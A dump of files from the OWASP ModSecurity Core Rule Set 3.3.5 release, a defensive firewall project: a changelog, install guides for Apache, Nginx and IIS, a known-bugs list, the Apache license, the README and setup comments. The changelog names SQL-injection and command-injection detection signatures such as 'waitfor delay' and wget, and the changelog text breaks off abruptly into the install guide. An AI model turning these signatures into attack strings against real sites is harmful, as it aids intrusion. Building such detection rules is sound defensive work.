This ruleset is included in the optional_rulesets dir * 42 - Comment Spam Comment Spam is used by the spammers to increase their rating in search engines by posting links to their site in other sites that allow posting of comments and messages. The rules in this ruleset will work against that. (Requires ModSecurity 2.5) * Tags A single type of attack is often detected by multiple rules. The new alert classification tags solve this issue by providing an alternative alert type indication and can serve for filtering and analysis of audit logs. The classification tags are hierarchical with slashes separating levels. Usually there are two levels with the top level describing the alert group and the lower level denoting the alert type itself, for example: WEB_ATTACK/SQL_INJECTION. False Positives Fixes: * Rule 960903 - Moved to phase 4 instead of 5 to avoid FPs * Rule 950107 - Will look for invalid url decoding in variables that are not automatically url decoded Additional rules logic: * Using the new "logdata" action for logging the matched signature in rules * When logging an event once, init the collection only if the alert needs to log * Using the new operator @pm as a qualifier before large rules to enhance performance (Requires ModSecurity 2.5) * SQL injection - A smarter regexp is used to detect 1=1,2=2,etc.. and not only 1=1. (Thanks to Marc Stern for the idea) * New XSS signatures - iframe & flash XSS ## Version 1.5.1 - 2007-12-06 False Positives Fixes: * Protocol Anomalies (file 21) - exception for Apache SSL pinger (Request: GET /) New Events: * 960019 - Detect HTTP/0.9 Requests HTTP/0.9 request are not common these days. This rule will log by default, and block in the blocking version of file 21 Other Fixes: * File 40, Rules 950004,950005 - Repaired the correction for the double url decoding problem * File 55 contained empty regular expressions. Fixed. ## Version 1.5 - 2007-11-23 New Rulesets: * 23 - Request Limits "Judging by appearances". 
This rulesets contains rules blocking based on the size of the request, for example, a request with too many arguments will be denied. Default policy changes: * XML protection off by default * BLOCKING dir renamed to optional_rules * Ruleset 55 (marketing) is now optional (added to the optional_rules dir) * Ruleset 21 - The exception for apache internal monitor will not log anymore New Events: * 960912 - Invalid request body Malformed content will not be parsed by modsecurity, but still there might be applications that will parse it, ignoring the errors. * 960913 - Invalid Request Will trigger a security event when request was rejected by apache with code 400, without going through ModSecurity rules. Additional rules logic: * 950001 - New signature: delete from * 950007 - New signature: waitfor delay False Positives Fixes: * 950006 - Will not be looking for /cc pattern in User-Agent header * 950002 - "Internet Explorer" signature removed * Double decoding bug used to cause FPs. Some of the parameters are already url-decoded by apache. This caused FPs when the rule performed another url-decoding transformation. The rules have been split so that parameters already decoded by apache will not be decoded by the rules anymore. * 960911 - Expression is much more permissive now * 950801 - Commented out entirely. NOTE: If your system uses UTF8 encoding, then you should uncomment this rule (in file 20) version 1.4.3 - 2007-07-21 New Events: * 950012 - HTTP Request Smuggling For more info on this attack: * 960912 - Invalid request body Malformed content will not be parsed by modsecurity, but still there might be applications that will parse it, ignoring the errors. * 960913 - Invalid Request Will trigger a security event when request was rejected by apache with code 400, without going through ModSecurity rules. 
False Positives Fixes: * 950107 - Will allow a % sign in the middle of a string as well * 960911 - A more accurate expression based on the rfc: * 950015 - Will not look for http/ pattern in the request headers Additional rules logic: * Since Apache applies scope directives only after ModSecurity phase 1 these directives cannot be used to exclude phase 1 rules. Therefore we moved all inspection rules to phase 2. version 1.4 build 2 - 2007-05-17 New Feature: * Search for signatures in XML content XML Content will be parsed and inspected for signatures New Events: * 950116 - Unicode Full/Half Width Abuse Attack Attempt Full-width unicode can be used to bypass content inspection. Such encoding will be forbidden * 960911 - Invalid HTTP request line Enforce request line to be valid, i.e.: ` ` * 960904 - Request Missing Content-Type (when there is content) When a request contains content, the content-type must be specified. If not, the content will not be inspected * 970018 - IIS installed in default location (any drive) Log once if IIS is installed in the /Inetpub directory (on any drive, not only C) * 950019 - Email Injection Web forms used for sending mail (such as "tell a friend") are often manipulated by spammers for sending anonymous emails Regular expressions fixes: * Further optimization of some regular expressions (using the non-greediness operator) The non-greediness operator, , prevents excessive backtracking FP fixes: * Rule 950107 - Will allow a parameter to end in a % sign from now on version 1.4 - 2007-05-02 New Events: * 970021 - WebLogic information disclosure Matching of `"JSP compile error"` in the response body, will trigger this rule, with severity 4 (Warning) * 950015,950910,950911 - HTTP Response Splitting Looking for HTTP Response Splitting patterns as described in Amit Klein's excellent white paper: ModSecurity does not support compressed content at the moment. 
Thus, the following rules have been added: * 960902 - Content-Encoding in request not supported Any incoming compressed request will be denied * 960903 - Content-Encoding in response not supported An outgoing compressed response will be logged to alert, but ONLY ONCE. False Positives Fixes: * Removed <.exe>,<.shtml> from restricted extensions * Will not be looking for SQL Injection signatures ``,`` in the Via request header * Excluded Referer header from SQL injection, XSS and command injection rules * Excluded X-OS-Prefs header from command injection rule * Will be looking for command injection signatures in REQUEST_COOKIES|REQUEST_COOKIES_NAMES instead of REQUEST_HEADERS:Cookie. * Allowing charset specification in the Content-Type Additional rules logic: * Corrected match of OPTIONS method in event 960015 * Changed location for event 960014 (proxy access) to REQUEST_URI_RAW * Moved all rules apart from method inspection from phase 1 to phase 2 - This will enable viewing content if such a rule triggers as well as setting exceptions using Apache scope tags. * Added match for double quote in addition to single quote for `` signature (SQL Injection) * Added 1=1 signature (SQL Injection) version 1.3.2 build 4 2007-01-17 Fixed apache 2.4 dummy requests exclusion Added persistent PDF UXSS detection rule ## Version 1.3.2 build 3 2007-01-10 Fixed regular expression in rule 960010 (file #30) to allow multipart form data content ## Version 1.3.2 - 2006-12-27 New events: * 960037 Directory is restricted by policy * 960038 HTTP header is restricted by policy Regular expressions fixes: * Regular expressions with @ at end of beginning (for example "@import) * Regular expressions with un-escaped "." * Command Injections now always require certain characters both before and after the command. Important since many are common English words (finger, mail) * The command injection wget is not searched in the UA header as it has different meaning there. 
* LDAP Fixed to reduce FPs: * More accurate regular expressions * high bit characters not accpeted between signature tokens. * Do not detect Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf ``` 8. Restart web server and ensure it starts without errors 9. Make sure your web sites are still running fine. 10. Proceed to the section "Testing the Installation" below. Installing on Nginx ------------------- 1. Compile ModSecurity into Nginx 2. Ensure that ModSecurity is loading correctly by checking error.log at start up for lines indicating ModSecurity is installed. An example might appear as follows: ```ModSecurity for nginx (STABLE)/2.9.1 (http://www.modsecurity.org/) configured.``` 3. The most common method of deploying ModSecurity we have seen is to create a new folder underneath the Nginx directory (typically /usr/local/nginx/conf/). Often this folder is called 'owasp-modsecurity-crs'. Create this folder and cd into it. 4. Download our release from https://coreruleset.org/installation/ and unpack it into a new owasp-modsecurity-crs folder. 5. Move the crs-setup.conf.example file to crs-setup.conf. Please take this time to go through this file and customize the settings for your local environment. Failure to do so may result in false negatives and false positives. See the section entitled OWASP CRS Configuration for more detail. 6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the '.example' extension. This will allow you to add exceptions without updates overwriting them in the future. 7. Nginx requires the configuration of a single ModSecurity configuration file within the nginx.conf file using the 'ModSecurityConfig' directive (when using ModSecurity 2.x). Best practice is to set 'ModSecurityConfig' to a file from which you will include your other ModSecurity configuration files. 
In this example we will use: ```ModSecurityConfig modsec_includes.conf;``` 7. Within modsec_includes.conf create your includes to the CRS folder similar to as follows (The modsecurity.conf file from the ModSecurity installation is included in this example): ``` include modsecurity.conf include owasp-modsecurity-crs/crs-setup.conf include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf include owasp-modsecurity-crs/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf include owasp-modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf include 
owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf include owasp-modsecurity-crs/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf ``` 8. Restart web server and ensure it starts without errors 9. Make sure your web sites are still running fine. 10. Proceed to the section "Testing the Installation" below. Installing on IIS ----------------- The IIS installer comes with an optional version of CRS built in. To upgrade or install this after the fact follow the following steps. 1. Navigate to "[drive_letters]:\Program Files\ModSecurity IIS\" 2. Download our release from https://coreruleset.org/installation/ and unpack it into the current folder. 3. Move the crs-setup.conf.example file to crs-setup.conf. Please take this time to go through this file and customize the settings for your local environment. Failure to do so may result in false negatives and false positives. See the section entitled OWASP CRS Configuration for more detail. 4. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the '.example' extension. This will allow you to add exceptions without updates overwriting them in the future. 5. 
Navigate back to the 'ModSecurity IIS' folder and modify the 'modsecurity_iis' to include the following: ``` include owasp-modsecurity-crs/crs-setup.conf include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf ``` 6. 
Restart web server and ensure it starts without errors 7. Make sure your web sites are still running fine. 8. Proceed to the section "Testing the Installation" below. Testing the Installation ======================== To test your installation you should be able to use any number of attacks. A typical request which should trigger CRS would be ```http://localhost/?param=">``` Upon sending this request you should see events reported in the error log (nginx, apache) or the event viewer (IIS). If you have not changed the defaults with regards to anomaly scoring, blocking and sampling percentage, then this request should have been blocked and access forbidden. Likewise if you have configured ModSecurity debug logging and/or audit logging this event should log to these locations as well. OWASP CRS Configuration ======================= The crs-setup.conf file includes management rules and directives that can control important CRS functions. The crs-setup.conf file comes with extensive comments. This section covers only the essential parts. By default we do not include settings within the crs-setup.conf that configure ModSecurity itself. Instead those configuration settings are set during the installation of ModSecurity proper. An example of such a configuration file is available via the ModSecurity project (https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended). Be aware the crs-setup.conf file DOES specify configuration directives such as SecDefaultAction. The default is the anomaly scoring mode with the appropriate SecDefaultAction as defined in the crs-setup.conf. Alternative configuration modes are supported and explained in crs-setup.conf. The default anomaly/correlation mode establishes an incoming anomaly score threshold of 5 and an outgoing anomaly score threshold of 4. The default installation has been tuned to reduce false positives in a way that will allow most requests to pass in this default setup. 
However, testing the setup and tuning false positives before going to production is vital. This is especially true if you raise the paranoia level, which is set to 1 by default. Higher paranoia levels ranging from 2 to 4 include more aggressive rules which will raise additional false positives but also raise the security level of your service. If you are unsure about the performance impact of the CRS or if you are unsure about the number of false positives, then you may want to use the sampling percentage. This number, which is set to 100 by default, controls the percentage of requests which is funneled into the CRS. Fresh installs on high traffic sites are advised to start with a low, or very low, percentage and raise the number slowly up to 100. Be aware that any number below 100 lets a random subset of requests bypass the ruleset completely. Update the TX policy settings for allowed Request Methods, File Extensions, maximum numbers of arguments, etc. to better reflect the environment that is being protected. Make sure your GeoIP and Project Honeypot settings are specified if you are using them. The GeoIP database is no longer included with the CRS. Instead you are advised to download it regularly. The use of Project Honeypot requires a free API key. These require an account but can be obtained at https://www.projecthoneypot.org/httpbl_configure.php. Be sure to check out the other settings present within the crs-setup.conf file. There are many other options that have to do with aspects of web application security that are beyond this document but are well explained in crs-setup.conf. 
modsecurity-crs-3.3.5/KNOWN_BUGS000066400000000000000000000054221446122515100163210ustar00rootroot00000000000000== OWASP ModSecurity Core Rule Set (CRS) KNOWN BUGS == == Report Bugs/Issues to GitHub Issues Tracker or the mailing list == * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues or the CRS Google Group at * https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project * There are still false positives for standard web applications in the default install (paranoia level 1). Please report these when you encounter them. False Positives from paranoia level 2 rules are less interesting, as we expect users to write exclusion rules for their alerts in the higher paranoia levels. * Permanent blocking of clients is based on a previous user agent / IP combination. A blocked client that changes its user agent therefore bypasses this filter. The plan is to allow for a purely IP based filter in the future. * Apache 2.4 prior to 2.4.11 is affected by a bug in parsing multi-line configuration directives, which causes Apache to fail during startup with an error such as: Error parsing actions: Unknown action: \\ Action 'configtest' failed. This bug is known to plague RHEL/Centos 7 below v7.4 or httpd v2.4.6 release 67 and Ubuntu 14.04 LTS users. https://bz.apache.org/bugzilla/show_bug.cgi?id=55910 We advise upgrading your Apache version. If upgrading is not possible, we have provided a script in the util/join-multiline-rules directory which converts the rules into a format that works around the bug. You have to re-run this script whenever you modify or update the CRS rules. * Debian up to and including Jessie lacks YAJL/JSON support in ModSecurity, which causes the following error in the Apache ErrorLog or SecAuditLog: 'ModSecurity: JSON support was not enabled.' JSON support was enabled in Debian's package version 2.8.0-4 (Nov 2014). You can either use backports.debian.org to install the latest ModSecurity release or disable rule id 200001. 
* As of CRS version 3.0.1, support has been added for the application/soap+xml MIME type by default, as specified in RFC 3902. OF IMPORTANCE, application/soap+xml is indicative that XML will be provided. In accordance with this, ModSecurity's XML Request Body Processor should also be configured to support this MIME type. Within the ModSecurity project, commit 5e4e2af (https://github.com/SpiderLabs/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e) has been merged to support this endeavour. However, if you are running a modified or preexisting version of the modsecurity.conf provided by this repository, you may wish to upgrade rule '200000' accordingly. The rule now appears as follows: ``` SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \ "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" ``` modsecurity-crs-3.3.5/LICENSE000066400000000000000000000261461446122515100156750ustar00rootroot00000000000000 Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. 
"Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." 
"Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. 
You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. 
Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. 
In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. 
Copyright 2006 the OWASP Core Rule Set contributors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. modsecurity-crs-3.3.5/README.md000066400000000000000000000047421446122515100161450ustar00rootroot00000000000000![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev) ![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev) ![GHA build v3.1/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.1%2Fdev) [![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/) [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) # OWASP ModSecurity Core Rule Set (CRS) The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. ## CRS Resources Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS. 
## Contributing to the CRS We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections. [Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. [Sign up for our Google Group](https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list. [Join the #coreruleset channel on OWASP Slack](http://owaspslack.com) to chat about the CRS. ## License Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. Copyright (c) 2021-2022 Core Rule Set project. All rights reserved. The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details. 
modsecurity-crs-3.3.5/SECURITY.md000066400000000000000000000001521446122515100164460ustar00rootroot00000000000000# Security Policy See policy here: https://github.com/coreruleset/coreruleset/blob/v4.0/dev/SECURITY.md modsecurity-crs-3.3.5/SPONSORS.md000066400000000000000000000002301446122515100164620ustar00rootroot00000000000000## GOLD SPONSORS * Edgio * Google * Microsoft * Nginx (Part of F5) * United Security Providers * VMWare ## SILVER SPONSORS * Bug Bounty Switzerland modsecurity-crs-3.3.5/crs-setup.conf.example000066400000000000000000001043101446122515100211040ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -- [[ Introduction ]] -------------------------------------------------------- # # The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack # detection rules that provide a base level of protection for any web # application. They are written for the open source, cross-platform # ModSecurity Web Application Firewall. # # See also: # https://coreruleset.org/ # https://github.com/SpiderLabs/owasp-modsecurity-crs # https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project # # # -- [[ System Requirements ]] ------------------------------------------------- # # CRS requires ModSecurity version 2.8.0 or above. # We recommend to always use the newest ModSecurity version. # # The configuration directives/settings in this file are used to control # the OWASP ModSecurity CRS. 
These settings do **NOT** configure the main # ModSecurity settings (modsecurity.conf) such as SecRuleEngine, # SecRequestBodyAccess, SecAuditEngine, SecDebugLog, and XML processing. # # The CRS assumes that modsecurity.conf has been loaded. It is bundled with # ModSecurity. If you don't have it, you can get it from: # 2.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v2/master/modsecurity.conf-recommended # 3.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended # # The order of file inclusion in your webserver configuration should always be: # 1. modsecurity.conf # 2. crs-setup.conf (this file) # 3. rules/*.conf (the CRS rule files) # # Please refer to the INSTALL file for detailed installation instructions. # # # -- [[ Mode of Operation: Anomaly Scoring vs. Self-Contained ]] --------------- # # The CRS can run in two modes: # # -- [[ Anomaly Scoring Mode (default) ]] -- # In CRS3, anomaly mode is the default and recommended mode, since it gives the # most accurate log information and offers the most flexibility in setting your # blocking policies. It is also called "collaborative detection mode". # In this mode, each matching rule increases an 'anomaly score'. # At the conclusion of the inbound rules, and again at the conclusion of the # outbound rules, the anomaly score is checked, and the blocking evaluation # rules apply a disruptive action, by default returning an error 403. # # -- [[ Self-Contained Mode ]] -- # In this mode, rules apply an action instantly. This was the CRS2 default. # It can lower resource usage, at the cost of less flexibility in blocking policy # and less informative audit logs (only the first detected threat is logged). # Rules inherit the disruptive action that you specify (i.e. deny, drop, etc). # The first rule that matches will execute this action. In most cases this will # cause evaluation to stop after the first rule has matched, similar to how many # IDSs function. 
